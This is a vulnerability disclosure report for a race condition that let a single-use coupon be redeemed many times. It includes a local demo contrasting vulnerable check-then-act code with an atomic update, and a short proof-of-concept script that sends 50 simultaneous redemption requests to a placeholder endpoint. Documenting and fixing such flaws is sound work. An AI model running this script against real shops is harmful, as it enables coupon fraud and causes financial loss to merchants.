Race Condition | Private Program | 2025-08-01
Race Condition in Coupon Redemption
Severity: High | Status: Resolved
Summary
An attacker who sent concurrent requests could apply a single-use coupon multiple times before the database lock was acquired.
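The check-then-act window described in the summary, shown next to one common way to close it with a single conditional UPDATE. This is an added example, not code from the original report and not the vendor's fix; the SQLite table, the function names and the barrier used to force the overlap are assumptions.

```python
import os, sqlite3, tempfile, threading

def new_db():
    """Create a throwaway SQLite file holding one unused single-use coupon (constructed data)."""
    path = os.path.join(tempfile.mkdtemp(), "coupons.db")
    with sqlite3.connect(path) as conn:
        conn.execute("CREATE TABLE coupons (code TEXT PRIMARY KEY, used INTEGER NOT NULL)")
        conn.execute("INSERT INTO coupons VALUES ('SAVE50', 0)")
    return path

def redeem_check_then_act(conn, code, window):
    """Vulnerable pattern: the 'is it unused?' read and the write are separate steps."""
    rows = conn.execute("SELECT used FROM coupons WHERE code = ?", (code,)).fetchall()
    if not rows or rows[0][0]:
        return False
    window()  # stands in for the time between check and write on a real server
    conn.execute("UPDATE coupons SET used = 1 WHERE code = ?", (code,))
    return True

def redeem_atomic(conn, code, window):
    """Hardened pattern: test and set in one statement, so only one caller changes the row."""
    window()  # line all callers up so they hit the database together
    cur = conn.execute("UPDATE coupons SET used = 1 WHERE code = ? AND used = 0", (code,))
    return cur.rowcount == 1

def successful_redemptions(redeem, workers=8):
    """Run `redeem` from `workers` threads at once and count how many were accepted."""
    path, barrier, results = new_db(), threading.Barrier(workers), []
    def worker():
        # One connection per thread, autocommit, waiting up to 30 s on a busy database.
        conn = sqlite3.connect(path, timeout=30, isolation_level=None)
        try:
            results.append(redeem(conn, "SAVE50", barrier.wait))
        finally:
            conn.close()
    threads = [threading.Thread(target=worker) for _ in range(workers)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results)

if __name__ == "__main__":
    print("check-then-act accepted:", successful_redemptions(redeem_check_then_act))
    print("atomic update accepted: ", successful_redemptions(redeem_atomic))
```

The barrier makes the overlap deterministic for the demonstration; on a live service the same window exists but is hit only some of the time, which is why a count of redemptions per coupon code greater than one is a useful detection signal.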
Proof of Concept
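import threading
import requests

url = "https://shop.example/redeem"  # placeholder: the report does not give the endpoint

def redeem():
    requests.post(url, data={"coupon": "SAVE50"})

# 50 concurrent redemptions of the same single-use coupon
threads = [threading.Thread(target=redeem) for _ in range(50)]
for t in threads:
    t.start()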
Impact
Financial loss through unlimited coupon redemption.
Responsible Disclosure
This vulnerability was reported responsibly and fixed by the vendor before public disclosure.